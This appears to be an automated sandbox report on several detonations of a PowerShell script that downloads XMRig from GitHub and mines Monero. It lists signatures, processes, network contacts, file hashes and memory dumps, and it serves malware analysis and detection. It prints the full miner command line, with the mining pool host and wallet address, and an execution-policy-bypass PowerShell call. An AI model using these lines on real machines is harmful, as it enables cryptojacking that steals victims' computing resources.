| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3984 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3984-0-0x00007FF887AD3000-0x00007FF887AD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtlhczlp.4ab.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3984-9-0x000002A9A1450000-0x000002A9A1472000-memory.dmp
memory/3984-10-0x00007FF887AD0000-0x00007FF888592000-memory.dmp
memory/3984-11-0x00007FF887AD0000-0x00007FF888592000-memory.dmp
memory/3984-12-0x00007FF887AD0000-0x00007FF888592000-memory.dmp
memory/3984-14-0x000002A9A14D0000-0x000002A9A14E2000-memory.dmp
memory/3984-15-0x000002A9A14B0000-0x000002A9A14BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2812-46-0x00000182CED10000-0x00000182CED30000-memory.dmp
memory/2812-47-0x00000182CED60000-0x00000182CED80000-memory.dmp
memory/2812-48-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-52-0x00000182CEDA0000-0x00000182CEDC0000-memory.dmp
memory/2812-51-0x00000182CED80000-0x00000182CEDA0000-memory.dmp
memory/2812-49-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/3984-50-0x00007FF887AD0000-0x00007FF888592000-memory.dmp
memory/3984-53-0x00007FF887AD3000-0x00007FF887AD5000-memory.dmp
memory/3984-54-0x00007FF887AD0000-0x00007FF888592000-memory.dmp
memory/2812-55-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-56-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-57-0x00000182CED80000-0x00000182CEDA0000-memory.dmp
memory/2812-58-0x00000182CEDA0000-0x00000182CEDC0000-memory.dmp
memory/2812-59-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-60-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-61-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-62-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-63-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-64-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-65-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-66-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-67-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-68-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-69-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-70-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-71-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-72-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-73-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-74-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-75-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-76-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-77-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-78-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-79-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-80-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-81-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-82-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-83-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-84-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-85-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-86-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-87-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-88-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-89-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-90-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-91-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-92-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-93-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-94-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-95-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-96-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-97-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-98-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-99-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-100-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-101-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-102-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-103-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-104-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-105-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-106-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-107-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-108-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-109-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-110-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-111-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-112-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-113-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-114-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-115-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-116-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
memory/2812-117-0x00007FF60A830000-0x00007FF60B463000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10v2004-20240426-en
Max time kernel
1788s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2432 wrote to memory of 2372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2432 wrote to memory of 2372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/2432-0-0x00007FFFE0893000-0x00007FFFE0895000-memory.dmp
memory/2432-10-0x0000012BF8CE0000-0x0000012BF8D02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5gv4ue5.x05.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2432-11-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2432-12-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2432-14-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2432-15-0x0000012BF9AB0000-0x0000012BF9AC2000-memory.dmp
memory/2432-16-0x0000012BF8E70000-0x0000012BF8E7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2372-47-0x000001965A0E0000-0x000001965A100000-memory.dmp
memory/2372-48-0x000001965A130000-0x000001965A150000-memory.dmp
memory/2372-49-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-52-0x000001965A170000-0x000001965A190000-memory.dmp
memory/2372-51-0x000001965A150000-0x000001965A170000-memory.dmp
memory/2372-50-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2432-53-0x00007FFFE0893000-0x00007FFFE0895000-memory.dmp
memory/2432-54-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2372-55-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2432-56-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp
memory/2372-57-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-59-0x000001965A170000-0x000001965A190000-memory.dmp
memory/2372-58-0x000001965A150000-0x000001965A170000-memory.dmp
memory/2372-60-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-61-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-62-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-63-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-64-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-65-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-66-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-67-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-68-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-69-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-70-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-71-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-72-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-73-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-74-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-75-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-76-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-77-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-78-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-79-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-80-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-81-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-82-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-83-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-84-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-85-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-86-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-87-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-88-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-89-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-90-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-91-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-92-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-93-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-94-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-95-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-96-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-97-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-98-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-99-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-100-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-101-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-102-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-103-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-104-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-105-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-106-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-107-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-108-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-109-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-110-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-111-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-112-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-113-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-114-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-115-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-116-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-117-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-118-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:43
Platform
win11-20240426-en
Max time kernel
1792s
Max time network
1752s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1280 wrote to memory of 2396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1280 wrote to memory of 2396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1280-0-0x00007FF83A093000-0x00007FF83A095000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5z3fhw4.51b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1280-9-0x000002D3FCB50000-0x000002D3FCB72000-memory.dmp
memory/1280-10-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-11-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-12-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-14-0x000002D3FD050000-0x000002D3FD062000-memory.dmp
memory/1280-15-0x000002D3FD030000-0x000002D3FD03A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
